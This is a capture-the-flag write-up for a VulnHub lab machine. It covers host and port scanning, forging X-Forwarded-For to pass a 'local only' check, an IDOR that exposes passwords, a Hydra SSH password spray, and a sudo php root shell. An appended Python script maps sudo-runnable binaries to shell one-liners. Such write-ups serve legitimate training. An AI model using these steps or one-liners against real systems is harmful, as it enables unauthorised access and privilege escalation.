vulnhub Me-and-My-Girlfriend-1

Host discovery on the local segment (the attacking Kali box is 192.168.0.112; the only VMware MAC answering is the target):

sudo arp-scan -l

┌──(jeremiah㉿kali)-[~/桌面]
└─$ sudo arp-scan -l       
[sudo] password for jeremiah:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:49:c8:a6, IPv4: 192.168.0.112
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1     90:76:9f:cd:9b:31       (Unknown)
192.168.0.106   b4:b5:b6:73:75:81       (Unknown)
192.168.0.110   00:0c:29:62:e3:74       VMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.932 seconds (132.51 hosts/sec). 3 responded
                                                                         
┌──(jeremiah㉿kali)-[~/桌面]
└─$

Full TCP port scan with version detection. Run without sudo, so Nmap falls back to a connect scan (hence "conn-refused" below) and skips OS fingerprinting; -sV is already implied by -A:

nmap -Pn -sV -p- -A 192.168.0.110

┌──(jeremiah㉿kali)-[~/桌面]
└─$ nmap -Pn -sV -p- -A 192.168.0.110 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 20:31 CST
Nmap scan report for 192.168.0.110 (192.168.0.110)
Host is up (0.00024s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
|   2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
|   256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
|_  256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.27 seconds
                                                                         
┌──(jeremiah㉿kali)-[~/桌面]
└─$

192.168.0.110 has two ports open: 22 (OpenSSH 6.6.1p1, Ubuntu 14.04 era) and 80 (Apache 2.4.7).

http://192.168.0.110/

Who are you? Hacker? Sorry This Site Can Only Be Accessed local!

Page source (the HTML comment is the hint):

Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<!-- Maybe you can search how to use x-forwarded-for -->

Forge the X-Forwarded-For header with a browser plugin (Burp match/replace or curl -H work just as well):

X-Forwarded-For: 127.0.0.1

The "local only" check reads the client address from this header, which any client can set, instead of from the TCP peer address, so the restriction is bypassed outright and the real site is served.

dirb http://192.168.0.110/

┌──(jeremiah㉿kali)-[~/桌面]
└─$ dirb http://192.168.0.110/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jul 14 20:39:35 2022
URL_BASE: http://192.168.0.110/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.0.110/ ----
==> DIRECTORY: http://192.168.0.110/config/
+ http://192.168.0.110/index.php (CODE:200|SIZE:120)
==> DIRECTORY: http://192.168.0.110/misc/
+ http://192.168.0.110/robots.txt (CODE:200|SIZE:32)
+ http://192.168.0.110/server-status (CODE:403|SIZE:293)

---- Entering directory: http://192.168.0.110/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.110/misc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Thu Jul 14 20:39:41 2022
DOWNLOADED: 4612 - FOUND: 3
                                                                         
┌──(jeremiah㉿kali)-[~/桌面]
└─$

Browsed the /config/ and /misc/ listings and robots.txt; nothing useful in them.

Registered an account and found a horizontal privilege escalation (IDOR) on the profile page: other users' profile data, including their passwords, can be read by changing the user identifier in the request. The user names and passwords collected from it go into two wordlists:

user.txt

eweuhtandingan
aingmaung
alice

pwd.txt

skuyatuh
qwerty!!!
4lic3

Spray the harvested names and passwords against SSH (only 9 combinations, so the -t warning below does not matter here):

hydra -L user.txt -P pwd.txt ssh://192.168.0.110

┌──(jeremiah㉿kali)-[~/桌面]
└─$ hydra -L user.txt -P pwd.txt ssh://192.168.0.110
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-07-14 20:48:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://192.168.0.110:22/
[22][ssh] host: 192.168.0.110   login: alice   password: 4lic3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-07-14 20:48:28
                                                                         
┌──(jeremiah㉿kali)-[~/桌面]
└─$

user: alice

pwd: 4lic3

Log in as alice and look for hidden files in her home directory:

ssh alice@192.168.0.110

ls -al

cd .my_secret

ls

cat flag1.txt

alice@gfriEND:~/.my_secret$ cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

Privilege escalation. php can be run through sudo (confirm with sudo -l before relying on it), and php -r executes arbitrary PHP, so system('/bin/sh') spawns a root shell:

CMD="/bin/sh"

sudo php -r "system('$CMD');"

whoami

cd /root

ls

cat flag2.txt

Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)

Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73

Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
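The root step works only because php is permitted through sudo. Before firing a one-liner like that, check `sudo -l`; the added example below (not code from this write-up or from the box) parses that output and flags entries whose binary can hand back a shell, with the matching one-liner. The sample `sudo -l` text in it is constructed to match what the successful `sudo php -r` implies; it was not captured from the machine, and the hostname and secure_path in it are placeholders.

```python
"""
Triage of `sudo -l` output before attempting privilege escalation.

Added example for this write-up, not code from the original page. SAMPLE_SUDO_L
is CONSTRUCTED (assumption: php runnable as root via sudo, which the successful
`sudo php -r` step implies); it is not real output from the box.
"""
import re

# Binaries that can spawn a shell when run via sudo; the php -r "system()" trick
# used above is one instance of this pattern.
SHELL_CAPABLE = {
    "php": "sudo php -r \"system('/bin/sh');\"",
    "python": "sudo python -c 'import os; os.system(\"/bin/sh\")'",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
    "perl": "sudo perl -e 'exec \"/bin/sh\";'",
    "vim": "sudo vim -c ':!/bin/sh'",
    "find": "sudo find . -exec /bin/sh \\; -quit",
}

# One sudoers entry as `sudo -l` prints it: "(runas) [NOPASSWD:] cmd[, cmd...]"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<nopasswd>NOPASSWD:)?\s*(?P<cmds>.+)$")

# Constructed sample (assumption), shaped like real `sudo -l` output.
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on gfriEND:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on gfriEND:
    (root) NOPASSWD: /usr/bin/php
"""


def parse_sudo_l(output):
    """Return [(runas, nopasswd, command), ...] from `sudo -l` output."""
    entries = []
    in_commands = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_commands = True          # everything after this header is an entry
            continue
        if not in_commands:
            continue                    # skip the "Matching Defaults" block
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").strip()
        nopasswd = m.group("nopasswd") is not None
        for cmd in m.group("cmds").split(","):
            entries.append((runas, nopasswd, cmd.strip()))
    return entries


def escalation_candidates(output):
    """Entries whose binary is shell-capable (or ALL), with the one-liner to try."""
    hits = []
    for runas, nopasswd, cmd in parse_sudo_l(output):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if cmd == "ALL" or binary in SHELL_CAPABLE:
            hits.append({
                "runas": runas,
                "nopasswd": nopasswd,
                "command": cmd,
                "payload": SHELL_CAPABLE.get(binary, "sudo /bin/sh"),
            })
    return hits


if __name__ == "__main__":
    for hit in escalation_candidates(SAMPLE_SUDO_L):
        print(hit)
```

In practice pipe the real output in (`sudo -l | python3 triage.py` with `sys.stdin.read()` in place of the sample); the defensive reading of the same table is that any of these binaries in sudoers, NOPASSWD or not, is equivalent to granting a root shell.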